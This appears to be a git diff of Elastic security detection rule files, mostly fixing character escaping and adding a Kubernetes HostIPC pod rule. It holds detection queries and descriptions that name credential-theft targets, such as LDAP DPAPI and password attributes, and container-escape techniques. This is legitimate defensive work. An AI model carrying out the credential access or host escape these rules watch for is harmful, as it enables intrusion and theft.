from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_104.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_104.json index 45f18744d01..cc2a4431873 100644 --- a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_104.json @@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02", - "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", "severity": "low", "tags": [ "OS: Linux", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_2.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_2.json index 5150d488cfe..5e736fdac1a 100644 --- a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_2.json +++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_2.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Sysctl File Event", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action in (\"opened-file\", \"read-file\", \"wrote-to-file\") and\nfile.path : (\"/etc/sysctl.conf\", \"/etc/sysctl.d\", \"/etc/sysctl.d/*\") and \nnot process.name in (\"auditbeat\", \"systemd-sysctl\")\n", "required_fields": [ { @@ -38,7 +38,7 @@ ], "risk_score": 21, "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_3.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_3.json index f142ab7d198..40e983384b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_3.json +++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_3.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Sysctl File Event", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action in (\"opened-file\", \"read-file\", \"wrote-to-file\") and\nfile.path : (\"/etc/sysctl.conf\", \"/etc/sysctl.d\", \"/etc/sysctl.d/*\") and \nnot process.name in (\"auditbeat\", \"systemd-sysctl\", \"dpkg\", \"dnf\", \"yum\", \"rpm\", \"apt\")\n", "required_fields": [ { @@ -40,7 +40,7 @@ ], "risk_score": 21, "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_1.json b/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_1.json index 1597dea37bd..3d9c6e7db97 100644 --- a/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_1.json +++ b/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_1.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_101.json b/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_101.json index c14d5bba1c1..2f5da7c7032 100644 --- a/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_101.json +++ b/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_101.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_102.json b/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_102.json index 8d9bd083a76..ff168f7400b 100644 --- a/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_102.json +++ b/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_102.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_103.json b/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_103.json index f28cc668a29..99d2986e328 100644 --- a/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_103.json +++ b/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_103.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_201.json b/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_201.json index 0e742c1012f..91e6c0bfea3 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_201.json +++ b/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_201.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_202.json b/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_202.json index 78071b55cbb..e2e4546f168 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_202.json +++ b/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_202.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_203.json b/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_203.json new file mode 100644 index 00000000000..8c5c79ad465 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_203.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects an attempt to create or modify a pod using the host IPC namespace. This gives access to data used by any pod that also use the hosts IPC namespace. If any process on the host or any processes in a pod uses the hosts inter-process communication mechanisms (shared memory, semaphore arrays, message queues, etc.), an attacker can read/write to those same mechanisms. They may look for files in /dev/shm or use ipcs to check for any IPC facilities being used.", + "false_positives": [ + "An administrator or developer may want to use a pod that runs as root and shares the host's IPC, Network, and PID namespaces for debugging purposes. If something is going wrong in the cluster and there is no easy way to SSH onto the host nodes directly, a privileged pod of this nature can be useful for viewing things like iptable rules and network namespaces from the host's perspective. Add exceptions for trusted container images using the query field \"kubernetes.audit.requestObject.spec.container.image\"" + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Pod Created With HostIPC", + "note": "", + "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.objectRef.resource:\"pods\"\n and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\")\n and kubernetes.audit.requestObject.spec.hostIPC:true\n and not kubernetes.audit.requestObject.spec.containers.image: (\"docker.elastic.co/beats/elastic-agent:8.4.0\")\n", + "references": [ + "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections", + "https://kubernetes.io/docs/concepts/security/pod-security-policy/#host-namespaces", + "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.containers.image", + "type": "text" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.hostIPC", + "type": "boolean" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "764c8437-a581-4537-8060-1fdb0e92c92d", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1610", + "name": "Deploy Container", + "reference": "https://attack.mitre.org/techniques/T1610/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 203 + }, + "id": "764c8437-a581-4537-8060-1fdb0e92c92d_203", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_4.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_4.json index a52fcbfed8b..7c03984dde6 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_4.json +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_4.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Access to a Sensitive LDAP Attribute", - "note": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "note": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "query": "any where host.os.type == \"windows\" and event.action == \"Directory Service Access\" and event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", "references": [ "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_5.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_5.json index d9e2424632e..d0ac355c285 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_5.json +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_5.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Access to a Sensitive LDAP Attribute", - "note": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "note": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "query": "any where event.action == \"Directory Service Access\" and event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", "references": [ "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_6.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_6.json index 989ee14b94a..d0ac85d676e 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_6.json +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_6.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Access to a Sensitive LDAP Attribute", - "note": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "note": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "query": "any where event.action == \"Directory Service Access\" and event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", "references": [ 